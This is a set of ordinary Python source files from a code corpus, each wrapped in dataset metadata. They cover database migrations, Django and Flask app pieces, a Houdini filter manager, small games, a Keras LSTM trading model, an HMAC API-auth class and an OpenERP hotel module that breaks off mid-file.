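example = Table('example', post_meta,
    Column('id', INTEGER, primary_key=True, nullable=False),
    Column('new_col', INTEGER),
)

def upgrade(migrate_engine):
    post_meta.bind = migrate_engine
    post_meta.tables['example'].columns['new_col'].create()

def downgrade(migrate_engine):
    # Exact reverse of upgrade(), keeping the migration reversible.
    post_meta.bind = migrate_engine
    post_meta.tables['example'].columns['new_col'].drop()
```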
Don't create your own engine; bind\n # migrate_engine to your metadata\n pre_meta.bind = migrate_engine\n post_meta.bind = migrate_engine\n post_meta.tables['company'].create()\n post_meta.tables['note'].create()\n pre_meta.tables['client_eval'].columns['eval_type_id'].drop()\n pre_meta.tables['client_auth'].columns['auth_end'].drop()\n pre_meta.tables['client_auth'].columns['auth_start'].drop()\n post_meta.tables['client_auth'].columns['auth_end_date'].create()\n post_meta.tables['client_auth'].columns['auth_start_date'].create()\n post_meta.tables['client_auth'].columns['created_date'].create()\n post_meta.tables['client_auth'].columns['therapist_id'].create()\n\n\ndef downgrade(migrate_engine):\n # Operations to reverse the above upgrade go here.\n pre_meta.bind = migrate_engine\n post_meta.bind = migrate_engine\n post_meta.tables['company'].drop()\n post_meta.tables['note'].drop()\n pre_meta.tables['client_eval'].columns['eval_type_id'].create()\n pre_meta.tables['client_auth'].columns['auth_end'].create()\n pre_meta.tables['client_auth'].columns['auth_start'].create()\n post_meta.tables['client_auth'].columns['auth_end_date'].drop()\n post_meta.tables['client_auth'].columns['auth_start_date'].drop()\n post_meta.tables['client_auth'].columns['created_date'].drop()\n post_meta.tables['client_auth'].columns['therapist_id'].drop()\n","sub_path":"db_repository/versions/020_migration.py","file_name":"020_migration.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"461516502","text":"import ast\nimport math\nfrom collections import defaultdict\nfrom typing import List, Dict, Sequence\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nimport sketch.compress_freq as cf\nimport sketch.sketch_frequent as f\nimport sketch.compress_dyadic as dyadic\nimport linear_bench\n\n\ndef combine_counts(counts: Sequence[Dict]):\n combined = dict()\n for cur_count in counts:\n for k,v in cur_count.items():\n combined[k] = combined.get(k, 0) + v\n return combined\n\n\ndef count_to_vec(x_to_track, x_counts: Dict) -> np.ndarray:\n counts = np.array([x_counts.get(x, 0) for x in x_to_track])\n return counts\n\n\ndef rmse(x):\n return np.sqrt(np.mean(x**2))\n\n\nclass LinearBenchProcessor:\n def __init__(\n self,\n x_to_track\n ):\n self.x_to_track = x_to_track\n\n def calc_range_query(\n self,\n summary_list: List[Dict],\n method_name: str,\n start_idx: int,\n end_idx: int\n ) -> np.ndarray:\n pass\n\n def calc_cum_query(\n self,\n summary_list: List[Dict],\n method_name: str,\n start_idx,\n end_idx\n ):\n cum_results = []\n if \"dyadic\" in method_name:\n dyadic_values = {}\n for cur_result in summary_list:\n cur_method = cur_result[\"method\"]\n cur_idx = cur_result[\"seg_idx\"]\n cur_counts = cur_result[\"counts\"]\n\n if cur_method == method_name:\n c_height, c_start_idx = cur_idx\n if (start_idx <= c_start_idx < end_idx and\n start_idx-1 <= c_start_idx - 2**c_height):\n dyadic_values = {\n (h, s_idx): counts for ((h, s_idx), counts) in dyadic_values.items()\n if s_idx > c_start_idx or s_idx - 2**h < c_start_idx - 2**c_height\n }\n dyadic_values[(c_height, c_start_idx)] = cur_counts\n new_final_count = count_to_vec(self.x_to_track, combine_counts(dyadic_values.values()))\n # new_final_count = self.count_to_vec(combine_counts(dyadic_values.values()))\n if (c_start_idx-start_idx) >= len(cum_results):\n cum_results.append(new_final_count)\n else:\n cum_results[c_start_idx-start_idx] 
= new_final_count\n else:\n cur_total = 0\n for cur_result in summary_list:\n cur_method = cur_result[\"method\"]\n cur_idx = cur_result[\"seg_idx\"]\n cur_counts = cur_result[\"counts\"]\n if cur_method == method_name and start_idx <= cur_idx < end_idx:\n # cur_total += self.count_to_vec(cur_counts)\n cur_total += count_to_vec(self.x_to_track, cur_counts)\n cum_results.append(np.copy(cur_total))\n return cum_results\n\n\ndef run_grains(dataset=\"caida\", x_track_file=None):\n grains = [8, 32, 128, 512, 2048]\n methods = [\n \"incremental\",\n \"pps\",\n \"cms_min\",\n \"random_sample\",\n \"truncation\",\n \"dyadic_truncation\",\n \"topvalue\",\n \"zero_est\"\n ]\n if x_track_file is None:\n x_to_track = list(range(1,401))\n else:\n x_df = pd.read_csv(x_track_file)\n x_to_track = x_df[\"x_track\"].values\n x_to_track = np.sort(x_to_track)\n proc = LinearBenchProcessor(x_to_track=x_to_track)\n for cur_grain in grains:\n print(\"Grain: {}\".format(cur_grain))\n cur_results = None\n with open(\"output/grain_{}_{}.out\".format(dataset, cur_grain)) as f:\n cur_results = ast.literal_eval(f.read())\n\n start_idx = cur_grain//2\n end_idx = cur_grain\n cum_method_results = dict()\n for cur_method in methods:\n if cur_method == \"zero_est\":\n cum_results = [np.zeros(len(x_to_track)) for _ in range(end_idx-start_idx)]\n else:\n cum_results = proc.calc_cum_query(cur_results, cur_method, start_idx, end_idx)\n # cum_results = [\n # list(i) for i in proc.calc_cum_query(cur_results, cur_method, start_idx, end_idx)\n # ]\n cum_method_results[cur_method] = cum_results\n with open(\"output/cum_{}_{}.out\".format(dataset, cur_grain), \"wb\") as f:\n pickle.dump(cum_method_results, f, protocol=0)\n\n\ndef test():\n results = linear_bench.run_test_bench()\n proc = LinearBenchProcessor(x_to_track=range(1,6))\n cum_results = proc.calc_cum_query(results, \"topvalue\", 0, 4)\n print(cum_results)\n cum_results = proc.calc_cum_query(results, \"dyadic_truncation\", 0, 4)\n print(cum_results)\n\n\ndef main():\n # run_grains(\"caida\", \"notebooks/caida1M-xtrack.csv\")\n run_grains(\"zipf\", \"notebooks/zipf10M-xtrack.csv\")\n # run_grains(\"caida10M\", \"/Users/edwardgan/Documents/Projects/datasets/caida-pcap/caida10M-ipdst-xtrack.csv\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/process_linear_out.py","file_name":"process_linear_out.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"445718777","text":"from sys import stdout\n\nfrom django.core.management.base import BaseCommand\n\nfrom PlagCheck.verification import plagcheck_elaboration, plagcheck_check_unverified\nfrom Elaboration.models import Elaboration\n\nclass Command(BaseCommand):\n help = 'Reinserts all elaborations and triggers a plagiarism check for documents which haven\\'t checked yet'\n\n def handle(self, *args, **options):\n\n elaborations = Elaboration.objects.all().order_by('submission_time')\n count = elaborations.count()\n counter = 0\n for elab in elaborations:\n counter += 1\n percent = (100.0 / count) * counter\n stdout.write(\"\\rAdding elaboration {0} of {1} ({2:6.2f}%)\".format(counter, count, percent))\n stdout.flush()\n plagcheck_elaboration(elab, store_only=True)\n stdout.write(\"\\n\")\n\n 
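`calc_cum_query` in the `process_linear_out.py` record above maintains a set of dyadic summaries so that any prefix of segments is covered by O(log n) blocks. The decomposition in isolation (note the original indexes a block by its right endpoint as `(height, start_idx)`; this sketch uses the left endpoint for readability):

```python
def dyadic_blocks(t):
    """Return (height, start) blocks covering [0, t), largest first."""
    blocks, start = [], 0
    while start < t:
        h = 0
        # Grow the block while it stays aligned and fits inside [0, t).
        while start % (2 ** (h + 1)) == 0 and start + 2 ** (h + 1) <= t:
            h += 1
        blocks.append((h, start))
        start += 2 ** h
    return blocks

print(dyadic_blocks(13))  # [(3, 0), (2, 8), (0, 12)] -- 3 blocks, not 13
```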
plagcheck_check_unverified()\n","sub_path":"PlagCheck/management/commands/plagcheck_check_missing.py","file_name":"plagcheck_check_missing.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"553097709","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nfrom EnglishStudy_Web import views\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'EnglishStudy_Web.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^$', views.IndexView.as_view(), name='home'),\n\n # /tracnghiem\n url(r'^tracnghiem/', include('tracnghiem.urls', namespace='tracnghiem')),\n\n # /accounts\n url(r'^accounts/', include('accounts.urls', namespace='accounts')),\n\n # /about\n url(r'^about/', 'EnglishStudy_Web.views.about', name='about'),\n\n # /polls - example polls application\n url(r'^polls/', include('polls.urls', namespace='polls')),\n\n # /admin - Django built-in interactive Admin page\n url(r'^admin/', include(admin.site.urls)),\n)\n\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nurlpatterns += staticfiles_urlpatterns()\n\n","sub_path":"EnglishStudy_Web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"51242636","text":"\"\"\"This module contains a class for managing and running PyFilter filter\nactions.\n\n\"\"\"\n# =============================================================================\n# IMPORTS\n# =============================================================================\n\n# Standard Library Imports\nimport argparse\nimport logging\nimport json\n\n# Houdini Toolbox Imports\nfrom ht.pyfilter.logger import logger\n\n# =============================================================================\n# CLASSES\n# =============================================================================\n\nclass PyFilterManager(object):\n \"\"\"Manager class for PyFilter operations.\"\"\"\n\n def __init__(self):\n self._data = {}\n self._operations = []\n\n # Populate the list of operations.\n self._registerOperations()\n\n # Build and parse any arguments.\n self._parsePyFilterArgs()\n\n # =========================================================================\n # PROPERTIES\n # =========================================================================\n\n @property\n def data(self):\n \"\"\"Data dictionary that can be used to pass information.\"\"\"\n return self._data\n\n @property\n def operations(self):\n \"\"\"A list of registered operations.\"\"\"\n return self._operations\n\n # =========================================================================\n # NON-PUBLIC METHODS\n # =========================================================================\n\n def _parsePyFilterArgs(self):\n \"\"\"Parse any args passed to PyFilter.\"\"\"\n parser = argparse.ArgumentParser()\n\n self._registerParserArgs(parser)\n\n filter_args = parser.parse_known_args()[0]\n\n self._processParsedArgs(filter_args)\n\n def _processParsedArgs(self, filter_args):\n \"\"\"Allow operations to process any args that were parsed.\"\"\"\n for operation in self.operations:\n operation.processParsedArgs(filter_args)\n\n def _registerOperations(self):\n \"\"\"Register operations that should be run by the manager.\"\"\"\n import hou\n\n # Look for files containing a list of operations.\n try:\n files = 
hou.findFiles(\"pyfilter/operations.json\")\n\n # If no files could be found then abort.\n except hou.OperationFailed:\n return\n\n for filepath in files:\n with open(filepath) as fp:\n data = json.load(fp)\n\n if \"operations\" not in data:\n continue\n\n for operation in data[\"operations\"]:\n module_name, class_name = operation\n\n # Import the operation class.\n cls = getattr(\n __import__(module_name, {}, {}, [class_name]),\n class_name\n )\n\n logger.debug(\"Registering {}\".format(class_name))\n\n # Add an instance of it to our operations list.\n self.operations.append(cls(self))\n\n def _registerParserArgs(self, parser):\n \"\"\"Register any necessary args with our parser.\n\n This allows filter operations to have their necessary args parsed and\n available.\n\n \"\"\"\n for operation in self.operations:\n operation.registerParserArgs(parser)\n\n # =========================================================================\n # METHODS\n # =========================================================================\n\n def runFilters(self, stage, *args, **kwargs):\n \"\"\"Run all filter operations for the specified stage.\"\"\"\n results = []\n\n for operation in self.operations:\n # Skip operations that should not be run.\n if not operation.shouldRun():\n continue\n\n # Attempt to find the function for this stage.\n try:\n func = getattr(operation, stage)\n\n # Filter has no function for this stage so don't do anything.\n except AttributeError:\n continue\n\n # Run the filter.\n results.append(func(*args, **kwargs))\n\n return True in results\n\n","sub_path":"python/ht/pyfilter/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"600844202","text":"#!/usr/bin/env python3\n\nimport sys\nimport pygame\nfrom pygame.locals import *\n\n\nfrom screen import *\nfrom pieces import *\n\nchoosed = None\nismove = False\nside = 1\n\nwhile 1:\n display.blit(surf, png_rect)\n update_pieces()\n mouse_pos = pygame.mouse.get_pos()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit(0)\n if event.type == pygame.KEYDOWN:\n if event.key == K_ESCAPE:\n sys.exit(0) \n if event.type == pygame.MOUSEBUTTONDOWN: \n if not choosed: \n choosed = check_pieces(mouse_pos, side)\n if choosed:\n ismove = True\n else:\n \n mouse_pos, i, j = calculate_pos(mouse_pos)\n\n possible_moves, attack_moves, castle_moves = choosed.possible_moves()\n if (i, j) in possible_moves: \n increase_move(choosed)\n\n choosed.x, choosed.y = i, j\n choosed.pos = mouse_pos\n \n side += 1\n elif (i, j) in attack_moves:\n increase_move(choosed)\n \n choosed.attack(i, j)\n choosed.x, choosed.y = i, j\n choosed.pos = mouse_pos\n side += 1\n elif (i, j) in castle_moves:\n increase_move(choosed)\n\n rock = castle_moves[(i, j)]\n \n if j < rock.y:\n rock.x, rock.y = i, j - 1\n else:\n rock.x, rock.y = i, j + 1\n\n choosed.x, choosed.y = i, j\n \n rock.pos = (board[rock.x][rock.y][0], board[rock.x][rock.y][1]) \n choosed.pos = mouse_pos\n side += 1\n \n else:\n choosed.pos = (board[choosed.x][choosed.y][0], board[choosed.x][choosed.y][1])\n choosed.choosed = False\n choosed = None\n ismove = False\n\n if ismove and choosed and 180 < mouse_pos[0] < 620 and 75 < mouse_pos[1] < 520:\n choosed.pos = (mouse_pos[0]-30, mouse_pos[1]-30)\n\n pygame.display.flip()\n 
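`PyFilterManager._registerOperations` above expects each `pyfilter/operations.json` found on the Houdini path to hold a list of `[module_name, class_name]` pairs, which it imports dynamically. A sketch of that contract; `my_ops.filters` / `MyOperation` are invented placeholders, so the import itself is only shown in a comment:

```python
import json

example = json.loads('{"operations": [["my_ops.filters", "MyOperation"]]}')

for module_name, class_name in example["operations"]:
    print("would register", module_name, class_name)
    # The manager's actual lookup (not executed here, since my_ops is invented):
    #   cls = getattr(__import__(module_name, {}, {}, [class_name]), class_name)
    #   self.operations.append(cls(self))
```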
clock.tick(30)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"124785621","text":"import random\ndinheiro=100\nprint(\"Ola jogador 1, voce possui {0} dinheiros\".format(dinheiro))\n\nwhile dinheiro > 0:\n aposta=int(input(\"faça sua aposta: \"))\n a= random.randint(0,36)\n print(a)\n #aposta= int(input(\"Digite sua aposta: \"))\n aposta1=input(\"a aposta é um numero ou paridade? \")\n if aposta == 0:\n dinheiro=0\n else:\n if aposta1 == \"n\":\n numero_aleatorio= input(\"digite um numero entre 1 e 36: \")\n if numero_aleatorio == a:\n dinheiro= dinheiro+(35*aposta)\n print(\"voce ganhou! seu saldo agora é {0}\".format(dinheiro))\n else:\n dinheiro= dinheiro - aposta\n print(\"voce perdeu, seu saldo agora é {0}\".format(dinheiro))\n elif aposta1 == \"p\":\n aposta2= input(\"voce quer impar ou par? \")\n if aposta2== \"i\":\n if a%2 == 0:\n dinheiro= dinheiro - aposta\n input(\"voce perdeu, seu saldo agora é {0}\".format(dinheiro))\n else:\n dinheiro= dinheiro + aposta\n input(\"voce ganhou! seu saldo agora é {0}\".format(dinheiro))\n else:\n if a%2 != 0:\n dinheiro= dinheiro - aposta\n input(\"voce perdeu, seu saldo agora é {0}\".format(dinheiro))\n else:\n dinheiro= dinheiro + aposta\n input(\"voce ganhou! seu saldo agora é {0}\".format(dinheiro))\n","sub_path":"backup/user_257/ch120_2020_10_07_01_23_28_292447.py","file_name":"ch120_2020_10_07_01_23_28_292447.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"610632937","text":"import numpy\nfrom tensorflow.contrib.keras.python.keras.layers import Dense, LSTM, Activation, BatchNormalization, initializers, Dropout\nfrom tensorflow.contrib.keras.python.keras.models import Sequential, load_model\nfrom tensorflow.contrib.keras.python.keras.optimizers import RMSprop\nfrom tensorflow.contrib.keras.python.keras.initializers import Constant\nfrom tensorflow.contrib.keras.python.keras.callbacks import TensorBoard, ModelCheckpoint\nfrom dataset import DataSet\nfrom smarttrader import read_sample_data\nfrom chart import extract_feature\nfrom tensorflow.contrib.keras.python.keras import backend as K\n\n\ndef relu_limited(x, alpha=0., max_value=1.):\n return K.relu(x, alpha=alpha, max_value=max_value)\n\n\ndef risk_estimation(y_true, y_pred):\n return -100. 
* K.mean((y_true - 0.0002) * y_pred)\n\n\nclass WindPuller(object):\n def __init__(self, input_shape, lr=0.01, n_layers=2, n_hidden=8, rate_dropout=0.2, loss=risk_estimation):\n print(\"initializing..., learing rate %s, n_layers %s, n_hidden %s, dropout rate %s.\" % (\n lr, n_layers, n_hidden, rate_dropout))\n self.model = Sequential()\n self.model.add(Dropout(rate=rate_dropout, input_shape=(input_shape[0], input_shape[1])))\n for i in range(0, n_layers - 1):\n self.model.add(LSTM(n_hidden * 4, return_sequences=True, activation='tanh',\n recurrent_activation='hard_sigmoid', kernel_initializer='glorot_uniform',\n recurrent_initializer='orthogonal', bias_initializer='zeros',\n dropout=rate_dropout, recurrent_dropout=rate_dropout))\n self.model.add(LSTM(n_hidden, return_sequences=False, activation='tanh',\n recurrent_activation='hard_sigmoid', kernel_initializer='glorot_uniform',\n recurrent_initializer='orthogonal', bias_initializer='zeros',\n dropout=rate_dropout, recurrent_dropout=rate_dropout))\n self.model.add(Dense(1, kernel_initializer=initializers.glorot_uniform()))\n # self.model.add(BatchNormalization(axis=-1, moving_mean_initializer=Constant(value=0.5),\n # moving_variance_initializer=Constant(value=0.25)))\n self.model.add(BatchNormalization(axis=-1))\n self.model.add(Activation(\"relu(alpha=0., max_value=1.0)\"))\n opt = RMSprop(lr=lr)\n self.model.compile(loss=loss,\n optimizer=opt,\n metrics=['accuracy'])\n\n def fit(self, x, y, batch_size=32, nb_epoch=100, verbose=1, callbacks=None,\n validation_split=0., validation_data=None, shuffle=True,\n class_weight=None, sample_weight=None, initial_epoch=0):\n self.model.fit(x, y, batch_size, nb_epoch, verbose, callbacks,\n validation_split, validation_data, shuffle, class_weight, sample_weight,\n initial_epoch)\n\n def save(self, path):\n self.model.save(path)\n\n def load_model(self, path):\n self.model = load_model(path)\n return self\n\n def evaluate(self, x, y, batch_size=32, verbose=1,\n sample_weight=None, **kwargs):\n return self.model.evaluate(x, y, batch_size, verbose,\n sample_weight)\n\n def predict(self, x, batch_size=32, verbose=0):\n return self.model.predict(x, batch_size, verbose)\n\n\ndef make_model(input_shape, train_set, test_set, nb_epochs=100, batch_size=128, lr=0.01, n_layers=1, n_hidden=16, rate_dropout=0.3):\n model_path = 'model.%s' % input_shape[0]\n wp = WindPuller(input_shape=input_shape, lr=lr, n_layers=n_layers, n_hidden=n_hidden, rate_dropout=rate_dropout)\n # train_set, test_set = read_feature(\"./ultimate_feature.%s\" % input_shape[0]) # read_ultimate(\"./\", input_shape)\n wp.fit(train_set.images, train_set.labels, batch_size=batch_size,\n nb_epoch=nb_epochs, shuffle=True, verbose=1,\n validation_data=(test_set.images, test_set.labels),\n callbacks=[TensorBoard(histogram_freq=1),\n ModelCheckpoint(filepath=model_path + '.best', save_best_only=True, mode='min')])\n scores = wp.evaluate(test_set.images, test_set.labels, verbose=0)\n print('Test loss:', scores[0])\n print('Test accuracy:', scores[1])\n\n wp.model.save(model_path)\n saved_wp = wp.load_model(model_path)\n scores = saved_wp.evaluate(test_set.images, test_set.labels, verbose=0)\n print('Test loss:', scores[0])\n print('test accuracy:', scores[1])\n pred = saved_wp.predict(test_set.images, 1024)\n # print(pred)\n # print(test_set.labels)\n pred = numpy.reshape(pred, [-1])\n result = numpy.array([pred, test_set.labels]).transpose()\n with open('output.' 
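One spot in `WindPuller.__init__` above deserves a flag: `Activation("relu(alpha=0., max_value=1.0)")` hands Keras a string, and Keras resolves string arguments by *name*, so this fails rather than building a capped ReLU. The `relu_limited` helper defined at the top of the file looks like the intended argument. A hedged correction, assuming that intent and keeping the file's old `tensorflow.contrib.keras` import path:

```python
from tensorflow.contrib.keras.python.keras.layers import Activation
from tensorflow.contrib.keras.python.keras import backend as K

def relu_limited(x, alpha=0., max_value=1.):
    # ReLU clipped to [0, max_value], matching the helper defined in the file.
    return K.relu(x, alpha=alpha, max_value=max_value)

# Pass the callable itself instead of a pseudo-call string:
act = Activation(relu_limited)
```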
+ str(input_shape[0]), 'w') as fp:\n for i in range(result.shape[0]):\n for val in result[i]:\n fp.write(str(val) + \"\\t\")\n fp.write('\\n')\n\n\ndef main(operation='train'):\n selector = [\"ROCP\", \"OROCP\", \"HROCP\", \"LROCP\", \"MACD\", \"RSI\", \"VROCP\", \"BOLL\", \"MA\", \"VMA\", \"PRICE_VOLUME\"]\n input_shape = [30, 61] # [length of time series, length of feature]\n raw_data = read_sample_data(\"toy_stock.csv\")\n moving_features, moving_labels = extract_feature(raw_data=raw_data, selector=selector, window=input_shape[0],\n with_label=True, flatten=False)\n moving_features = numpy.asarray(moving_features)\n moving_features = numpy.transpose(moving_features, [0, 2, 1])\n moving_labels = numpy.asarray(moving_labels)\n moving_labels = numpy.reshape(moving_labels, [moving_labels.shape[0], 1])\n validation_size = 600\n train_set = DataSet(moving_features[:-validation_size], moving_labels[:-validation_size])\n test_set = DataSet(moving_features[-validation_size:], moving_labels[-validation_size:])\n if operation == 'train':\n make_model(input_shape, train_set, test_set)\n\n\nif __name__ == '__main__':\n main(\"train\")\n","sub_path":"DeepTrader.py","file_name":"DeepTrader.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"132205169","text":"# coding: utf-8\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport hashlib\nimport hmac\nfrom requests.utils import to_native_string\nimport time\n\nfrom requests.auth import AuthBase\n\n\nclass HMACAuth(AuthBase):\n def __init__(self, api_key, api_secret, api_version):\n self.api_key = api_key\n self.api_secret = api_secret\n self.api_version = api_version\n\n def __call__(self, request):\n timestamp = str(int(time.time() * 1000))\n message = timestamp + request.url + (request.body or '')\n secret = self.api_secret\n print(message)\n\n if not isinstance(message, bytes):\n message = message.encode()\n if not isinstance(secret, bytes):\n secret = secret.encode()\n\n signature = hmac.new(secret, message, hashlib.sha512).hexdigest()\n request.headers.update({\n to_native_string('BB-KEY'): self.api_key,\n to_native_string('BB-SIGNATURE'): signature,\n to_native_string('BB-NONCE'): timestamp,\n })\n print(request.headers)\n return request","sub_path":"bitbetween/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"229850366","text":"import unittest\nfrom urllib.parse import urlparse, parse_qs, urlencode\n\nfrom flask import Response, json\nfrom flask.testing import FlaskClient\nfrom flask_jwt_extended import JWTManager, create_access_token\n\nimport server\n\n\nclass ApiTestCase(unittest.TestCase):\n \"\"\"Test case for server API\"\"\"\n\n def setUp(self):\n server.app.testing = True\n self.app = FlaskClient(server.app, Response)\n JWTManager(server.app)\n\n def tearDown(self):\n pass\n\n # submit query\n def test_permalink(self):\n testUrl = 'http://www.example.com/?arg=value'\n query = urlencode({'url': testUrl})\n data = {\n \"field1\": \"value1\",\n \"field2\": \"value2\"\n }\n response = self.app.post('/createpermalink?' 
+ query, data=json.dumps(data),\n content_type='application/json')\n self.assertEqual(200, response.status_code, \"Status code is not OK\")\n\n response_data = json.loads(response.data)\n self.assertTrue(response_data)\n self.assertIn('permalink', response_data, 'Response has no permalink field')\n\n orig_parts = urlparse(testUrl)\n resp_parts = urlparse(response_data['permalink'])\n self.assertEqual(orig_parts.scheme, resp_parts.scheme, \"Permalink URL scheme mismatches\")\n self.assertEqual(orig_parts.netloc, resp_parts.netloc, \"Permalink URL netloc mismatches\")\n self.assertEqual(orig_parts.path, resp_parts.path, \"Permalink URL path mismatches\")\n self.assertIn('k', parse_qs(resp_parts.query), \"Permalink has no k query parameter\")\n\n query = urlencode({'key': parse_qs(resp_parts.query)['k'][0]})\n response = self.app.get('/resolvepermalink?' + query)\n self.assertEqual(200, response.status_code, \"Status code is not OK\")\n\n response_data = json.loads(response.data)\n self.assertTrue(response_data)\n self.assertIn('query', response_data, 'Response has no query field')\n self.assertIn('state', response_data, 'Response has no state field')\n self.assertEqual({'arg': 'value'}, response_data['query'], 'Response query mismatch')\n self.assertEqual(data, response_data['state'], 'Response state mismatch')\n","sub_path":"tests/api_tests.py","file_name":"api_tests.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"388992846","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2012-Today Serpent Consulting Services Pvt. Ltd. ()\n# Copyright (C) 2004 OpenERP SA ()\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
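`HMACAuth` in the `auth.py` record above signs `nonce + url + body` with HMAC-SHA512 and ships key, signature and nonce as request headers. The same computation in isolation, with invented credentials; this is also what a server would recompute to verify such a request:

```python
import hashlib
import hmac
import time

secret = b"my-api-secret"  # hypothetical credential
url = "https://api.example.com/v1/orders"
body = '{"amount": 1}'

nonce = str(int(time.time() * 1000))  # millisecond timestamp as nonce
message = (nonce + url + body).encode()
signature = hmac.new(secret, message, hashlib.sha512).hexdigest()

headers = {"BB-KEY": "my-api-key", "BB-SIGNATURE": signature, "BB-NONCE": nonce}
print(headers)
```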
If not, see \n#\n##############################################################################\nfrom openerp.exceptions import except_orm, Warning\nfrom openerp import models,fields,api,_\nfrom openerp import netsvc\nimport datetime\nimport time\n\nclass hotel_floor(models.Model):\n\n _name = \"hotel.floor\"\n _description = \"Floor\"\n\n name = fields.Char('Floor Name', size=64, required=True, select=True)\n sequence = fields.Integer('Sequence', size=64)\n\nclass product_category(models.Model):\n\n _inherit = \"product.category\"\n\n isroomtype = fields.Boolean('Is Room Type')\n isamenitytype = fields.Boolean('Is Amenities Type')\n isservicetype = fields.Boolean('Is Service Type')\n\n\nclass hotel_room_type(models.Model):\n\n _name = \"hotel.room.type\"\n _description = \"Room Type\"\n\n cat_id = fields.Many2one('product.category','category', required=True, delegate=True, select=True, ondelete='cascade')\n\nclass product_product(models.Model):\n\n _inherit = \"product.product\"\n\n isroom = fields.Boolean('Is Room')\n iscategid = fields.Boolean('Is categ id')\n isservice = fields.Boolean('Is Service id')\n\nclass hotel_room_amenities_type(models.Model):\n\n _name = 'hotel.room.amenities.type'\n _description = 'amenities Type'\n\n cat_id = fields.Many2one('product.category','category', required=True, delegate=True, ondelete='cascade')\n\nclass hotel_room_amenities(models.Model):\n\n _name = 'hotel.room.amenities'\n _description = 'Room amenities'\n\n room_categ_id = fields.Many2one('product.product','Product Category' ,required=True, delegate=True, ondelete='cascade')\n rcateg_id = fields.Many2one('hotel.room.amenities.type','Amenity Catagory')\n\nclass hotel_room(models.Model):\n\n _name = 'hotel.room'\n _description = 'Hotel Room'\n\n product_id = fields.Many2one('product.product','Product_id' ,required=True, delegate=True, ondelete='cascade')\n floor_id = fields.Many2one('hotel.floor','Floor No',help='At which floor the room is located.')\n max_adult = fields.Integer('Max Adult')\n max_child = fields.Integer('Max Child')\n room_amenities = fields.Many2many('hotel.room.amenities','temp_tab','room_amenities','rcateg_id',string='Room Amenities',help='List of room amenities. 
')\n status = fields.Selection([('available', 'Available'), ('occupied', 'Occupied')], 'Status',default='available')\n capacity = fields.Integer('Capacity')\n @api.multi\n def set_room_status_occupied(self):\n return self.write({'status': 'occupied'})\n\n @api.multi\n def set_room_status_available(self):\n return self.write({'status': 'available'})\n\n\nclass hotel_folio(models.Model):\n\n @api.multi\n def copy(self,default=None):\n '''\n @param self : object pointer\n @param default : dict of default values to be set\n '''\n return self.env['sale.order'].copy(default=default)\n\n @api.multi \n def _invoiced(self, name, arg):\n '''\n @param self : object pointer\n @param name: Names of fields.\n @param arg: User defined arguments\n '''\n return self.env['sale.order']._invoiced(name, arg)\n\n @api.multi\n def _invoiced_search(self ,obj, name, args):\n '''\n @param self : object pointer\n @param name: Names of fields.\n @param arg: User defined arguments\n '''\n return self.env['sale.order']._invoiced_search(obj, name, args)\n\n _name = 'hotel.folio'\n _description = 'hotel folio new'\n _rec_name = 'order_id'\n _order = 'id desc'\n\n name = fields.Char('Folio Number', size=24,default=lambda obj: obj.env['ir.sequence'].get('hotel.folio'),readonly=True)\n order_id = fields.Many2one('sale.order','Order', delegate=True, required=True, ondelete='cascade')\n checkin_date = fields.Datetime('Check In', required=True, readonly=True, states={'draft':[('readonly', False)]})\n checkout_date = fields.Datetime('Check Out', required=True, readonly=True, states={'draft':[('readonly', False)]})\n room_lines = fields.One2many('hotel.folio.line','folio_id', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help=\"Hotel room reservation detail.\")\n service_lines = fields.One2many('hotel.service.line','folio_id', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help=\"Hotel services detail provide to customer and it will include in main Invoice.\")\n hotel_policy = fields.Selection([('prepaid', 'On Booking'), ('manual', 'On Check In'), ('picking', 'On Checkout')], 'Hotel Policy',default='manual', help=\"Hotel policy for payment that either the guest has to payment at booking time or check-in check-out time.\")\n duration = 